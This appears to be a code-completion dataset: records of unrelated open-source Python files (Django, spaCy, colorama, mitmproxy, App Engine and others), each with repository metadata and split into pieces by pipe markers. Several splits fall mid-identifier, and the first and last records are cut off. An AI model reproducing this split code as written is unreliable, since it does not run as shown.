for status_new in self._get_toplevel_diagnosticstat(diag_array):
name = Util.get_grn_resource_name(status_new.name)
rosp |
laxmikantG/mypublisher | mypublisher/urls.py | Python | mit | 629 | 0.012719 | from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
# (r'^statinfo/$', 'appname.views.stat_info'),
(r'^login/$', 'django.contrib.auth.views.login'),
(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page' : '/login'}),
(r'^menu/$', 'mypublisher.views.mainm | enu'),
(r'^cmanager/$', 'mypublisher.views.content_manager'),
(r'^cmanager/upload$', 'mypub | lisher.views.render_upload_content'),
(r'^cmanager/upload/save$', 'mypublisher.views.save_content'),
) |
anhstudios/swganh | data/scripts/templates/object/tangible/component/dna/shared_dna_template_brackaset.py | Python | mit | 485 | 0.045361 | #### NOTICE: THI | S FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/component/dna/shared_dna_template_brackaset.iff"
result.attribute_template_id = -1
result.stfName("craft_dna_components_n","dna_template_brackaset")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return | result |
mwgg/WeeChat-DeaDBeeF-np | deadbeef_np.py | Python | mit | 524 | 0.009542 | import commands
import weechat
def weechat_np(data, buffer, args):
read_track = commands.getoutput('deadbeef --nowplaying "%a - (%b) - %t [%@:BPS@bit / %@:BITRATE@kbps / %@: | SAMPLERATE | @Hz]"').split('\n')
weechat.command(buffer, '/me is currently listening to: ' + read_track[1])
return weechat.WEECHAT_RC_OK
weechat.register("deadbeef_np", "mwgg", "0.9", "MIT", "Show name of the song currently played by DeaDBeeF", "", "")
weechat.hook_command("np", "Get/send now playing info.", "", "", "", "weechat_np", "")
|
ashbc/tgrsite | forum/models.py | Python | isc | 5,132 | 0.001559 | from django.db import models
from django.shortcuts import reverse
from users.models import Member
body_size = 32768
class Forum(models.Model):
parent = models.ForeignKey(
'self',
on_delete=models.CASCADE,
blank=True, null=True,
related_name='subforums')
sort_index = models.IntegerField(default=0,
help_text='Index for sorting. Lower value = earlier in list.')
title = models.CharField(max_length=64, verbose_name="Name")
description = models.CharField(max_length=256, blank=True)
def __str__(self):
return self.title
def get_parents(self):
if self.parent is None:
return []
tree = []
seen = {}
# walk up through tree to root
x = self.parent
while True:
tree.append(x)
seen[x.pk] = True
if x.parent is not None and x.parent.pk not in seen:
# traverse upwards
x = x.parent
else:
# reached root or loop parent
break
return reversed(tree)
# string that represents the forum's location
# eg "Roleplaying / LARP / Character Sheets"
# might be useful to generalise this for Threads
def get_parent_tree(self):
tree = [str(x) for x in self.get_parents()]
if not tree:
return '-'
return ' / '.join(tree)
get_parent_tree.short_description = 'Location'
# QuerySet of subforums
def get_subforums(self):
return Forum.objects.filter(parent=self.id)
# list of string representations of subforums
def get_subforums_str(self):
return [str(x) for x in self.get_subforums()]
get_subforums.short_description = 'Subforums'
get_subforums_str.short_description = 'Subforums'
@staticmethod
def get_parentless_forums():
return Forum.objects.filter(parent__isnull=True)
def get_threads_count(self):
return Thread.objects.filter(forum=self.id).count()
get_threads_count.short_description = 'threads'
# recursively get thread count
# i.e. number of threads here and in all subforums
def get_threads_count_r(self, seen=None):
if seen is None:
seen = {self.pk:True}
count = 0
for subforum in self.get_subforums():
if not subforum.pk in seen:
seen[subforum.pk] = True
count += subforum.get_threads_count_r(seen)
return count + self.get_threads_count()
def get_la | test_post(self):
return self. | thread_set.latest('pub_date')
def get_absolute_url(self):
return reverse("forum:subforum", args=(self.pk,))
# return self.thread_set.order_by('pub_date').reverse()[:1][::-1]
class Thread(models.Model):
# cascade because we need to be able to delete forums maybe?
# in which case forumless threads will either die,
# or need to be moved -before- the forum is deleted
forum = models.ForeignKey(Forum, on_delete=models.CASCADE)
title = models.CharField(max_length=64)
body = models.TextField(max_length=body_size)
pub_date = models.DateTimeField('date posted')
# pinned/stickied/whatever threads will show up before all others in their forums
is_pinned = models.BooleanField(default=False)
# prevents people not admin from replying to a thread
is_locked = models.BooleanField(default=False)
# until we implement proper banning/deactivation, just cascade
author = models.ForeignKey(Member, on_delete=models.CASCADE)
# people subscribed to updates
subscribed = models.ManyToManyField(Member, related_name="thread_notification_subscriptions")
def __str__(self):
return self.title
def get_author(self):
return Member.objects.get(id=self.author.id).equiv_user.username
get_author.short_description = 'Author'
def get_response_count(self):
return Response.objects.filter(thread=self.id).count()
def get_all_authors(self):
authors = [x.author for x in self.response_set.all()]
authors.append(self.author)
return list(set(authors))
def get_absolute_url(self):
return reverse("forum:viewthread", args=(self.id,))
# a reply in a forum thread
# there are fundamental similarities between thread OPs and responses;
# but the decision was made early to put the latter as part of the Thread class...
class Response(models.Model):
# when a thread is deleted its responses are deleted
thread = models.ForeignKey(Thread, on_delete=models.CASCADE)
body = models.TextField(max_length=body_size)
pub_date = models.DateTimeField('date posted', auto_now_add=True)
author = models.ForeignKey(Member, on_delete=models.CASCADE)
def __str__(self):
# TODO: probably strip markdown
return self.body
def get_author(self):
return Member.objects.get(id=self.author.id)
get_author.short_description = 'Author'
def get_absolute_url(self):
return reverse("forum:viewthread", args=(self.thread_id,)) + "#response-" + str(self.pk)
|
mauodias/PyFuteBOT | configTemplate.py | Python | gpl-2.0 | 365 | 0.030137 | def __init__(self):
self.twitter = twitter()
self.facebook = | facebook()
self.core = core()
class twitter():
consumer_key='CONSUMER_KEY'
consumer_secret='CONSUMER_SECRET'
access_token_key='ACCESS_TOKEN_KEY'
access_token_secret='ACCESS_TOKEN_SECRET'
class facebook():
token='TOKEN'
group='GROUP_ID'
class core():
loopTime=60 | |
mclumd/lene | tests/ontology_tests/create_tests.py | Python | mit | 3,101 | 0.00387 | # tests.ontology_tests.create_tests
# Tests for the create functionality of the ontology
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: timestamp
#
# Copyright (C) 2014 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: create_tests.py [] benjamin@bengfort.com $
"""
Tests for the create functionality of the ontology.
This includes the construction of the following objects:
* OWL Classes
* OWL Data Properties
* OWL Object Properties
* OWL Instances
As well as the compilation, creation, and serialization of an entire
ontology to RDF/XML or to any other format supported by the lene package.
"""
##########################################################################
## Imports
##########################################################################
import unittest
import tempfile
from lene.exceptions import *
from lene.ontology.create import *
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import DC, FOAF, OWL, RDF, RDFS
##########################################################################
## OWLClass Unit Tests
##########################################################################
class OWLClassTests(unittest.TestCase):
@unittest.skip("Not implemented")
def test_bind_to_graph(self):
"""
Assert that binding adds correct number of nodes
"""
pass
@unittest.skip("Not implemented")
def test_unbind_from_graph(self):
"""
Assert that unbinding removes correct number of nodes
"""
pass
##########################################################################
## OWLClass Integration Tests
##########################################################################
class OWLClassIntegrationTest(unittest.TestCase):
"""
Test the complete construction of an OWL ontology with just simple
OWL Class objects, etc.
"""
def test_ontology_construction(self):
"""
Test end to end ontology construction with OWLClass
"""
# Create an RDF graph
graph = Graph()
# Create various classes
Plant = OWLClass("Plant", OWL.Thing, "The plant type", "The class of all plant types")
Flower = OWLClass("Flower", UMD.Plant, "Flowering plants", "Flowering plants, also known as angiosperms.")
Shrub = OWLClass("Shrub", UMD.Plant, "Shrubbery", "Shrubs, a type of plant which branches from the base.")
# Bind the classes to the graph
| Plant | .bind(graph)
Flower.bind(graph)
Shrub.bind(graph)
# Create and bind an instance of a flower
instance = Flower.instantiate("Magnolia")
graph.add(instance)
self.assertIn(Plant.root, graph)
self.assertIn(Flower.root, graph)
self.assertIn(Shrub.root, graph)
self.assertIn(instance, graph)
##########################################################################
## OWLGraph Tests
##########################################################################
class OWLGraphTests(unittest.TestCase):
pass
|
cortext/crawtextV2 | ~/venvs/crawler/lib/python2.7/site-packages/pip/_vendor/colorama/ansitowin32.py | Python | mit | 6,664 | 0.002101 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
winterm = None
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = sys.platform.startswith('win')
# should we strip ANSI sequences from our output?
if strip is None:
strip = on_windows
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = on_windows and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
| AnsiFore.RESET: (winterm.fore, ),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinC | olor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
}
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif not self.wrapped.closed and is_a_tty(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
for match in self.ANSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(paramstring)
self.call_win32(command, params)
def extract_params(self, paramstring):
def split(paramstring):
for p in paramstring.split(';'):
if p != '':
yield int(p)
return tuple(split(paramstring))
def call_win32(self, command, params):
if params == []:
params = [0]
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in ('H', 'f'): # set cursor position
func = winterm.set_cursor_position
func(params, on_stderr=self.on_stderr)
elif command in ('J'):
func = winterm.erase_data
func(params, on_stderr=self.on_stderr)
elif command == 'A':
if params == () or params == None:
num_rows = 1
else:
num_rows = params[0]
func = winterm.cursor_up
func(num_rows, on_stderr=self.on_stderr)
|
Kazade/NeHe-Website | google_appengine/google/appengine/ext/remote_api/remote_api_services.py | Python | bsd-3-clause | 17,948 | 0.001059 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Service configuration for remote API.
This module is shared by both the remote_api_stub and the handler.
"""
import sys
from google.appengine.api import api_base_pb
from google.appengine.api import mail_service_pb
from google.appengine.api import urlfetch_service_pb
from google.appengine.api import user_service_pb
from google.appengine.api.app_identity import app_identity_service_pb
from google.appengine.api.blobstore import blobstore_service_pb
from google.appengine.api.capabilities import capability_service_pb
from google.appengine.api.channel import channel_service_pb
from google.appengine.api.files import file_service_pb
from google.appengine.api.images import images_service_pb
from google.appengine.api.logservice import log_service_pb
from google.appengine.api.memcache import memcache_service_pb
from google.appengine.api.modules import modules_service_pb
from google.appengine.api.prospective_search import prospective_search_pb
from google.appengine.api.remote_socket import remote_socket_service_pb
from google.appengine.api.search import search_service_pb
from google.appengine.api.system import system_service_pb
from google.appengine.api.taskqueue import taskqueue_service_pb
from google.appengine.api.xmpp import xmpp_service_pb
from google.appengine.datastore import datastore_pb
from google.appengine.datastore import datastore_v4_pb
from google.appengine.ext.remote_api import remote_api_pb
SERVICE_PB_MAP = {
'app_identity_service': {
'SignForApp': (app_identity_service_pb.SignForAppRequest,
app_identity_service_pb.SignForAppResponse),
'GetPublicCertificatesForApp': (
app_identity_service_pb.GetPublicCertificateForAppRequest,
app_identity_service_pb.GetPublicCertificateForAppResponse),
'GetServiceAccountName': (
app_identity_service_pb.GetServiceAccountNameRequest,
app_identity_service_pb.GetServiceAccountNameResponse),
'GetDefaultGcsBucketName': (
app_identity_service_pb.GetDefaultGcsBucketNameRequest,
app_identity_service_pb.GetDefaultGcsBucketNameResponse),
'GetAccessToken': (app_identity_service_pb.GetAccessTokenRequest,
app_identity_service_pb.GetAccessTokenResponse),
},
'blobstore': {
'CreateUploadURL': (blobstore_service_pb.CreateUploadURLRequest,
blobstore_service_pb.CreateUploadURLResponse),
'DeleteBlob': (blobstore_service_pb.DeleteBlobRequest,
api_base_pb.VoidProto),
'FetchData': (blobstore_service_pb.FetchDataRequest,
blobstore_service_pb.FetchDataResponse),
'DecodeBlobKey': (blobstore_service_pb.DecodeBlobKeyRequest,
blobstore_service_pb.DecodeBlobKeyResponse),
'CreateEncodedGoogleStorageKey':
(blobstore_service_pb.CreateEncodedGoogleStorageKeyRequest,
blobstore_service_pb.CreateEncodedGoogleStorageKeyResponse),
},
'capability_service': {
'IsEnabled': (capability_service_pb.IsEnabledRequest,
capability_service_pb.IsEnabledResponse),
},
'channel': {
'CreateChannel': (channel_service_pb.CreateChannelRequest,
channel_service_pb.CreateChannelResponse),
'SendChannelMessage': (channel_service_pb.SendMessageRequest,
api_base_pb.VoidProto),
},
'datastore_v3': {
'Get': (datastore_pb.GetRequest, datastore_pb.GetResponse),
'Put': (datastore_pb.PutRequest, datastore_pb.PutResponse),
'Delete': (datastore_pb.DeleteRequest, datastore_pb.DeleteResponse),
'AllocateIds':(datastore_pb.AllocateIdsRequest,
datastore_pb.AllocateIdsResponse),
'RunQuery': (datastore_pb.Query,
datastore_pb.QueryResult),
'Next': (datastore_pb.NextRequest, datastore_pb.QueryResult),
'BeginTransaction':(datastore_pb.BeginTransactionRequest,
datastore_pb.Transaction),
'Commit': (datastore_pb.Transaction,
datastore_pb.CommitResponse),
'Rollback': (datastore_pb.Transaction,
api_base_pb.VoidProto),
'GetIndices': (api_base_pb.StringProto,
datastore_pb.CompositeIndices),
},
'da | tastore_v4': {
'AllocateIds': (datastore_v4_pb.AllocateIdsRequest,
| datastore_v4_pb.AllocateIdsResponse),
},
'file': {
'Create': (file_service_pb.CreateRequest,
file_service_pb.CreateResponse),
'Open': (file_service_pb.OpenRequest,
file_service_pb.OpenResponse),
'Close': (file_service_pb.CloseRequest,
file_service_pb.CloseResponse),
'Append': (file_service_pb.AppendRequest,
file_service_pb.AppendResponse),
'Stat': (file_service_pb.StatRequest,
file_service_pb.StatResponse),
'Delete': (file_service_pb.DeleteRequest,
file_service_pb.DeleteResponse),
'Read': (file_service_pb.ReadRequest,
file_service_pb.ReadResponse),
'ReadKeyValue': (file_service_pb.ReadKeyValueRequest,
file_service_pb.ReadKeyValueResponse),
'Shuffle': (file_service_pb.ShuffleRequest,
file_service_pb.ShuffleResponse),
'GetShuffleStatus': (file_service_pb.GetShuffleStatusRequest,
file_service_pb.GetShuffleStatusResponse),
'GetCapabilities': (file_service_pb.GetCapabilitiesRequest,
file_service_pb.GetCapabilitiesResponse),
'GetDefaultGsBucketName':
(file_service_pb.GetDefaultGsBucketNameRequest,
file_service_pb.GetDefaultGsBucketNameResponse),
'ListDir': (file_service_pb.ListDirRequest,
file_service_pb.ListDirResponse),
},
'images': {
'Transform': (images_service_pb.ImagesTransformRequest,
images_service_pb.ImagesTransformResponse),
'Composite': (images_service_pb.ImagesCompositeRequest,
images_service_pb.ImagesCompositeResponse),
'Histogram': (images_service_pb.ImagesHistogramRequest,
images_service_pb.ImagesHistogramResponse),
'GetUrlBase': (images_service_pb.ImagesGetUrlBaseRequest,
images_service_pb.ImagesGetUrlBaseResponse),
'DeleteUrlBase': (images_service_pb.ImagesDeleteUrlBaseRequest,
images_service_pb.ImagesDeleteUrlBaseResponse),
},
'logservice': {
'Flush': (log_service_pb.FlushRequest, api_base_pb.VoidProto),
'SetStatus': (log_service_pb.SetStatusRequest, api_base_pb.VoidProto),
'Read': (log_service_pb.LogReadRequest, log_service_pb.LogReadResponse),
},
'mail': {
'Send': (mail_service_pb.MailMessage, api_base_pb.VoidProto),
'SendToAdmins': (mail_service_pb.MailMessage, api_base_pb.VoidProto),
},
'matcher': {
'Subscribe': (prospective_search_pb.SubscribeRequest,
prospective_search_pb.SubscribeResponse),
'Unsubscribe': (prospective_search_pb.UnsubscribeRequest,
prospective_search_pb.UnsubscribeResponse),
'ListSubscriptions': (prospective_search_p |
nop33/indico-plugins | chat/indico_chat/blueprint.py | Python | gpl-3.0 | 2,683 | 0.004473 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.core.plugins import IndicoPluginBlueprint
from indico_chat.controllers.event import RHChatEventPage
from indico_chat.controllers.logs import RHChatManageEventLogs, RHChatManageEventShowLogs, RHChatManageEventAttachLogs
from indico_chat.controllers.management import (RHChatManageEvent, RHChatManageEventModify, RHChatManageEventRefresh,
RHChatManageEventRemove, RHChatManageEventCreate,
RHChatManageEventAttach)
blueprint = IndicoPluginBlueprint(' | chat', 'indico_chat', url_prefix='/event/<confId>')
# Event
blueprint.add_url_rule('/chat', 'event_page', RHChatEventPage)
# Event management
blueprint.add_url_rule('/manage/chat/', 'manage_rooms', RHChatManageEvent | )
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/', 'manage_rooms_modify', RHChatManageEventModify,
methods=('GET', 'POST'))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/', 'manage_rooms_logs', RHChatManageEventLogs)
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/show', 'manage_rooms_show_logs',
RHChatManageEventShowLogs)
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/logs/attach', 'manage_rooms_attach_logs',
RHChatManageEventAttachLogs, methods=('POST',))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/refresh', 'manage_rooms_refresh', RHChatManageEventRefresh,
methods=('POST',))
blueprint.add_url_rule('/manage/chat/<int:chatroom_id>/remove', 'manage_rooms_remove', RHChatManageEventRemove,
methods=('POST',))
blueprint.add_url_rule('/manage/chat/create', 'manage_rooms_create', RHChatManageEventCreate,
methods=('GET', 'POST'))
blueprint.add_url_rule('/manage/chat/attach', 'manage_rooms_attach', RHChatManageEventAttach, methods=('POST',))
|
spacy-io/spaCy | spacy/cli/convert.py | Python | mit | 10,094 | 0.001684 | from typing import Optional, Any, List, Union
from enum import Enum
from pathlib import Path
from wasabi import Printer
import srsly
import re
import sys
import itertools
from ._util import app, Arg, Opt
from ..training import docs_to_json
from ..tokens import DocBin
from ..training.converters import iob_to_docs, conll_ner_to_docs, json_to_docs
from ..training.converters import conllu_to_docs
# Converters are matched by file extension except for ner/iob, which are
# matched by file extension and content. To add a converter, add a new
# entry to this dict with the file extension mapped to the converter function
# imported from /converters.
CONVERTERS = {
"conllubio": conllu_to_docs,
"conllu": conllu_to_docs,
"conll": conllu_to_docs,
"ner": conll_ner_to_docs,
"iob": iob_to_docs,
"json": json_to_docs,
}
# File types that can be written to stdout
FILE_TYPES_STDOUT = ("json",)
class FileTypes(str, Enum):
json = "json"
spacy = "spacy"
@app.command("convert")
def convert_cli(
# fmt: off
input_path: str = Arg(..., help="Input file or directory", exists=True),
output_dir: Path = Arg("-", help="Output directory. '-' for stdout.", allow_dash=True, exists=True),
file_type: FileTypes = Opt("spacy", "--file-type", "-t", help="Type of data to produce"),
n_sents: int = Opt(1, "--n-sents", "-n", help="Number of sentences per doc (0 to disable)"),
seg_sents: bool = Opt(False, "--seg-sents", "-s", help="Segment sentences (for -c ner)"),
model: Optional[str] = Opt(None, "--model", "--base", "-b", help="Trained spaCy pipeline for sentence segmentation to use as base (for --seg-sents)"),
morphology: bool = Opt(False, "--morphology", "-m", help="Enable appending morphology to tags"),
merge_subtokens: bool = Opt(False, "--merge-subtokens", "-T", help="Merge CoNLL-U subtokens"),
converter: str = Opt("auto", "--converter", "-c", help=f"Converter: {tuple(CONVERTERS.keys())}"),
ner_map: Optional[Path] = Opt(None, "--ner-map", "-nm", help="NER tag mapping (as JSON-encoded dict of entity types)", exists=True),
lang: Optional[str] = Opt(None, "--lang", "-l", help="Language (if tokenizer required)"),
concatenate: bool = Opt(None, "--concatenate", "-C", help="Concatenate output to a single file"),
# fmt: on
):
"""
Convert files into json or DocBin format for training. The resulting .spacy
file can be used with the train command and other experiment management
functions.
If no output_dir is specified and the output format is JSON, the data
is written to stdout, so you can pipe them forward to a JSON file:
$ spacy convert some_file.conllu --file-type json > some_file.json
DOCS: https://spacy.io/api/cli#convert
"""
if isinstance(file_type, FileTypes):
# We get an instance of the FileTypes from the CLI so we need its string value
file_type = file_type.value
input_path = Path(input_path)
output_dir = "-" if output_dir == Path("-") else output_dir
silent = output_dir == "-"
msg = Printer(no_print=silent)
verify_cli_args(msg, input_path, output_dir, file_type, converter, ner_map)
converter = _get_converter(msg, converter, input_path)
convert(
input_path,
output_dir,
file_type=file_type,
n_sents=n_sents,
seg_sents=seg_sents,
model=model,
morphology=morphology,
merge_subtokens=merge_subtokens,
converter=converter,
ner_map=ner_map,
lang=lang,
concatenate=concatenate,
silent=silent,
msg=msg,
)
def convert(
input_path: Union[str, Path],
output_dir: Union[str, Path],
*,
file_type: str = "json",
n_sents: int = 1,
seg_sents: bool = False,
model: Optional[str] = None,
morphology: bool = False,
merge_subtokens: bool = False,
converter: str = "auto",
ner_map: Optional[Path] = None,
lang: Optional[str] = None,
concatenate: bool = False,
silent: bool = True,
msg: Optional[Printer],
) -> None:
if not msg:
msg = Printer(no_print=silent)
ner_map = srsly.read_json(ner_map) if ner_map is not None else None
doc_files = []
for input_loc in walk_directory(Path(input_path), converter):
input_data = input_loc.open("r", encoding="utf-8").read()
# Use converter function to convert data
func = CONVERTERS[converter]
docs = func(
input_data,
n_sents=n_sents,
seg_sents=seg_sents,
append_morphology=morphology,
merge_subtokens=merge_subtokens,
lang=lang,
model=model,
no_print=silent,
ner_map=ner_map,
)
doc_files.append((input_loc, docs))
if concatenate:
all_docs = itertools.chain.from_iterable([docs for _, docs in doc_files])
doc_files = [(input_path, all_docs)]
for input_loc, docs in doc_files:
if file_type == "json":
data = [docs_to_json(docs)]
len_docs = len(data)
else:
db = DocBin(docs=docs, store_user_data=True)
len_docs = len(db)
data = db.to_bytes()
if output_dir == "-":
_print_docs_to_stdout(data, file_type)
else:
if input_loc != input_path:
subpath = input_loc.relative_to(input_path)
output_file = Path(output_dir) / subpath.with_suffix(f".{file_type}")
else:
output_file = Path(output_dir) / input_loc.parts[-1]
output_file = output_file.with_suffix(f".{file_type}")
_write_docs_to_file(data, output_file, file_type)
msg.good(f"Generated output file ({len_docs} documents): {output_file}")
def _print_docs_to_stdout(data: Any, output_type: str) -> None:
if output_type == "json":
srsly.write_json("-", data)
else:
sys.stdout.buffer.write(data)
def _write_docs_to_file(data: Any, output_file: Path, output_type: str) -> None:
if not output_file.parent.exists():
output_file.parent.mkdir(parents=True)
if output_type == "json":
srsly.write_json( | output_file, data)
else:
with output_file.open("wb") as file_:
file_.write(data)
def autodetect_ner_format(input_data: str) -> Optional[str]:
# guess format from the first 20 lines
lines = input_data.split("\n")[:20]
format_guesses = {"ner": 0, "i | ob": 0}
iob_re = re.compile(r"\S+\|(O|[IB]-\S+)")
ner_re = re.compile(r"\S+\s+(O|[IB]-\S+)$")
for line in lines:
line = line.strip()
if iob_re.search(line):
format_guesses["iob"] += 1
if ner_re.search(line):
format_guesses["ner"] += 1
if format_guesses["iob"] == 0 and format_guesses["ner"] > 0:
return "ner"
if format_guesses["ner"] == 0 and format_guesses["iob"] > 0:
return "iob"
return None
def walk_directory(path: Path, converter: str) -> List[Path]:
if not path.is_dir():
return [path]
paths = [path]
locs = []
seen = set()
for path in paths:
if str(path) in seen:
continue
seen.add(str(path))
if path.parts[-1].startswith("."):
continue
elif path.is_dir():
paths.extend(path.iterdir())
elif converter == "json" and not path.parts[-1].endswith("json"):
continue
elif converter == "conll" and not path.parts[-1].endswith("conll"):
continue
elif converter == "iob" and not path.parts[-1].endswith("iob"):
continue
else:
locs.append(path)
# It's good to sort these, in case the ordering messes up cache.
locs.sort()
return locs
def verify_cli_args(
msg: Printer,
input_path: Union[str, Path],
output_dir: Union[str, Path],
file_type: FileTypes,
converter: str,
ner_map: Optional[Path],
):
input_path = Path(input_path)
if file_type not in FILE_TYPES_STDOUT and output_dir == "-":
msg.fail(
f"Can't write .{file_type} data to stdout. Please specify an out |
civiclee/Hack4Cause2017 | src/snack-overflow/emcit/emcit/api/user.py | Python | mit | 1,756 | 0 | """User administration API"""
from flask import request, jsonify, Blueprint
from flask_login import current_user
from emcit.models import User
from emcit.resources import UserAdministrationResource
from emcit.util import required_access, api_error, validate
from emcit.schemas import user_schema
user_api = Blueprint('user_api', __name__)
@user_api.route('', methods=['GET'])
@required_access('admin')
def get_users():
return jsonify(map(UserAdministrationResource, User.all()))
@user_api.route('/<int:user_id>', methods=['GET'])
@required_access('admin')
def get_user(user_id):
return jsonify(UserAdministrationResource(User.get(user_id)))
@user_api.route('', methods=['POST'])
@required_access('admin')
@validate(user_schema)
def create_user():
user = User.from_json(request.get_json())
user.save()
return jsonify(UserAdministrationResource(user))
@user_api.route('/<int:user_id>', methods=['PUT'])
@required_access('admin')
@validate(user_schema)
def update_user(user_id):
user = User.get_by_id(us | er_id)
if not user:
return api_error('User not found', 404)
json = request.get_json()
if 'password' in request.json:
user.set_passw | ord(json.get('password'))
user.name = json.get('name')
user.email = json.get('email')
user.phone_number = json.get('phone_number')
user.role = json.get('role')
user.save()
return jsonify(UserAdministrationResource(user))
@user_api.route('/<int:id>', methods=['DELETE'])
@required_access('admin')
def delete_user(id):
user = User.get(id)
if not user:
return api_error('User not found', 404)
if user.id == current_user.id:
return api_error('Cannot delete self', 404)
user.delete()
return '', 202
|
mitmproxy/mitmproxy | test/mitmproxy/addons/test_modifyheaders.py | Python | mit | 6,005 | 0.000666 | import pytest
from mitmproxy.addons.modifyheaders import parse_modify_spec, ModifyHeaders
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy.test.tutils import tresp
def test_parse_modify_spec():
spec = parse_modify_spec("/foo/bar/voing", True)
assert spec.matches.pattern == "foo"
assert spec.subject == b"bar"
assert spec.read_replacement() == b"voing"
spec = parse_modify_spec("/foo/bar/vo/ing/", False)
assert spec.matches.pattern == "foo"
assert spec.subject == b"bar"
assert spec.read_replacement() == b"vo/ing/"
spec = parse_modify_spec("/bar/voing", False)
assert spec.matches(tflow.tflow())
assert spec.subject == b"bar"
assert spec.read_replacement() == b"voing"
with pytest.raises(ValueError, match="Invalid regular expression"):
